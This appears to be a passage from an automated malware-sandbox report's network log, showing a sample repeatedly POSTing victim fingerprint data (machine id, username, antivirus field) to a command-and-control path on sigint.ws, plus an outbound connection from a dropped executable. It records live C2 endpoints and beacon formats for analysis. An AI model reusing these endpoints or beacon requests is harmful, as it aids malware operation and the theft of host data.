                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:10.346992016 CEST3422INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              28192.168.2.44980280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:10.716389894 CEST3423OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:10.897917032 CEST3423INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:10 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              29192.168.2.44980380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:11.166089058 CEST3424OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:11.350131989 CEST3424INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.449782172.67.152.230443C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              30192.168.2.44980480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:11.691875935 CEST3425OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:11.876013041 CEST3425INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:11 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              31192.168.2.44980580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:12.457299948 CEST3426OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:12.640063047 CEST3426INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:12 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              32192.168.2.44980680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:12.991151094 CEST3427OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:13.170902014 CEST3427INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              33192.168.2.44980780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:13.581561089 CEST3428OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:13.761343002 CEST3428INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:13 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              34192.168.2.44980880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:14.080650091 CEST3428OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:14.265993118 CEST3429INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              35192.168.2.44980980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:14.556780100 CEST3429OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:14.736346960 CEST3430INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:14 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              36192.168.2.44981080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:15.300527096 CEST3430OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:15.483221054 CEST3431INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              37192.168.2.44981180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:15.765337944 CEST3431OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:15.946785927 CEST3432INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:15 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              38192.168.2.44981280.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:16.364540100 CEST3432OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:16.544522047 CEST3432INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              39192.168.2.44981380.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:16.846545935 CEST3433OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:17.025465965 CEST3433INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:16 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              4192.168.2.449893149.154.167.99443C:\Users\user\AppData\Local\Temp\1000007001\file_22613.exe
                                                                              TimestampkBytes transferredDirectionData


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              40192.168.2.44981480.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:17.528471947 CEST3434OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:17.710797071 CEST3434INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:17 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              41192.168.2.44981580.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:18.395076036 CEST3435OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:18.579144001 CEST3435INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:18 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              42192.168.2.44981680.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:18.919404984 CEST3436OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:19.103904963 CEST3436INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:19 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              43192.168.2.44981780.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:19.458105087 CEST3437OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:19.643877029 CEST3437INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:19 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              44192.168.2.44981880.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:20.253472090 CEST3438OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:20.432085991 CEST3438INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:20 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              45192.168.2.44981980.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:20.991168976 CEST3439OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:21.171302080 CEST3439INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              46192.168.2.44982080.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:21.626939058 CEST3440OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
                                                                              Data Raw: 69 64 3d 34 32 35 36 32 30 38 38 33 33 39 32 26 76 73 3d 33 2e 31 30 26 73 64 3d 33 31 66 35 63 64 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 36 35 31 36 38 39 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30
                                                                              Data Ascii: id=425620883392&vs=3.10&sd=31f5cd&os=1&bi=1&ar=1&pc=651689&un=user&dm=&av=13&lv=0
                                                                              Jun 2, 2022 01:54:21.811204910 CEST3440INHTTP/1.1 200 OK
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 01 Jun 2022 23:54:21 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 6<c><d>0


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              47192.168.2.44982180.66.64.10380C:\Users\user\Desktop\0XzeMRyE1e.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Jun 2, 2022 01:54:22.195677996 CEST3440OUTPOST /f8dfksdj3/index.php HTTP/1.1
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Host: sigint.ws
                                                                              Content-Length: 82
                                                                              Cache-Control: no-cache
